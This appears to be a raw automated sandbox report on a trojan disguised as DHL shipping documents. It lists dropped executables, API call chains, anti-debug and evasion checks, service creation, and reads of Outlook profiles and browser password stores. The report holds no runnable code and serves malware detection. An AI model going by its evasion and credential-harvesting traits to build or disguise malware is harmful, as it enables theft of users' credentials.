                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe, Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: String function: 010668F0 appears 92 times
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: String function: 01064EBD appears 56 times
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: String function: 00401EE0 appears 33 times
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_010611A0 OpenSCManagerW,_fprintf,OpenServiceW,DeleteService,_fprintf,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetLastError,_fprintf,CloseServiceHandle,CloseServiceHandle,1_2_010611A0
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exe ReversingLabs: Detection: 43%
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exe Virustotal: Detection: 37%
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeFile read: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeJump to behavior
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeProcess created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeProcess created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.mJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeProcess created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeFile created: C:\Users\user\AppData\Local\Temp\nsv9935.tmpJump to behavior
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/5@2/2
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: OpenSCManagerW,_fprintf,GetSystemDirectoryW,lstrcpyW,CreateServiceW,CloseServiceHandle,CloseServiceHandle,GetLastError,_fprintf,CloseServiceHandle,1_2_010610B0
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: OpenSCManagerW,_fprintf,GetSystemDirectoryW,lstrcpyW,CreateServiceW,CloseServiceHandle,CloseServiceHandle,GetLastError,_fprintf,CloseServiceHandle,2_2_010610B0
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002D13000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003CAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ?u0097U??/??ufffd?ufffd.csBase64 encoded string: 'IwKBXjNRCdw8lIyWLafopbJDyfGg4tBtJpKdYfBdgZN4c/KU7p3OHgtWJM8b0KUg'
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6048:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0040147B GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,2_2_0040147B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: GetTickCount1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Kernel32.dll1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Sleep1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Kernel32.dll1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: VirtualAlloc1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Kernel32.dll1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: Embedding1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: regserver1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: unregserver1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: unregister1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: unreg1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: package1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: ACTION=ADMIN1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: uninstall1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: update1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: uiet1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: passive1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: help1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCommand line argument: REMOVE=ALL1_2_01061C90
                Source: tdbwdaltxz.exeString found in binary or memory: F-Stopw
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, u00ab????/ufffdzufffd?ufffd.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ?u0097U??/??ufffd?ufffd.csCryptographic APIs: 'TransformFinalBlock'
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ?u0097U??/??ufffd?ufffd.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: wntdll.pdbUGP source: tdbwdaltxz.exe, 00000001.00000003.256979811.000000001A5B0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000001.00000003.256743149.000000001A740000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: tdbwdaltxz.exe, 00000001.00000003.256979811.000000001A5B0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000001.00000003.256743149.000000001A740000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01066935 push ecx; ret 1_2_01066948
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0040D2E1 push ecx; ret 2_2_0040D2F4
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01066935 push ecx; ret 2_2_01066948
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01068008 push esi; ret 2_2_0106800A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01068314 push esi; ret 2_2_01068316
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01068363 push edi; ret 2_2_01068365
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01068409 push edi; ret 2_2_0106840B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01061C90 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,Sleep,_fseek,_fseek,VirtualAlloc,__fread_nolock,#17,GetCommandLineW,lstrlenW,_fprintf,lstrlenW,_fprintf,lstrlenW,ExitProcess,lstrlenW,lstrlenW,lstrlenW,CLSIDFromString,FreeLibrary,1_2_01061C90
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeFile created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeJump to dropped file
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_1-14442
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_1-13240
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe API coverage: 3.0 %
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E07DA GetSystemInfo,1_2_005E07DA
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00406715 FindFirstFileExW,2_2_00406715
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_1-12801
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_1-13331
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_1-12805
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_1-13294
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeAPI call chain: ExitProcess graph end nodegraph_2-27661
                Source: tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01072526 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_01072526
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01061C90 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,Sleep,_fseek,_fseek,VirtualAlloc,__fread_nolock,#17,GetCommandLineW,lstrlenW,_fprintf,lstrlenW,_fprintf,lstrlenW,ExitProcess,lstrlenW,lstrlenW,lstrlenW,CLSIDFromString,FreeLibrary,1_2_01061C90
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_01074D5B __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,__get_osfhandle,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_01074D5B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Process token adjusted: Debug
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E005F mov eax, dword ptr fs:[00000030h]1_2_005E005F
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E017B mov eax, dword ptr fs:[00000030h]1_2_005E017B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E0109 mov eax, dword ptr fs:[00000030h]1_2_005E0109
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_005E013E mov eax, dword ptr fs:[00000030h]1_2_005E013E
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_01057358 LdrInitializeThunk,2_2_01057358
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106BC59 SetUnhandledExceptionFilter,1_2_0106BC59
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106BC7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0106BC7C
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00401E16 SetUnhandledExceptionFilter,2_2_00401E16
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00401C83 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00401C83
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_004060A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004060A4
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00401F2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00401F2A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0106BC59 SetUnhandledExceptionFilter,2_2_0106BC59
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_0106BC7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0106BC7C

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe protection: execute and read and write
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ?u0097U??/??ufffd?ufffd.cs Reference to suspicious API methods: ('?????', 'MapVirtualKey@user32.dll')
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, ufffd?ufffd?ufffd/?ufffdi??.cs Reference to suspicious API methods: ('?????', 'LoadLibrary@kernel32.dll'), ('?????', 'GetProcAddress@kernel32')
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Process created: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,1_2_01079912
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: EnumSystemLocalesEx,1_2_01072C02
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_0107380E
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: GetLocaleInfoEx,1_2_01072C37
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,1_2_0107483A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,1_2_01072B8A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_010733CD
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,1_2_01073E4A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,1_2_0106CE68
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: GetLocaleInfoEx,__wcsnicmp,_TestDefaultCountry,_TestDefaultCountry,2_2_01079912
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_0107380E
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,2_2_0107483A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_01072B8A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,2_2_010733CD
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: EnumSystemLocalesEx,2_2_01072C02
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: GetLocaleInfoEx,2_2_01072C37
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_01073E4A
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0106CE68
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106445F cpuid 1_2_0106445F
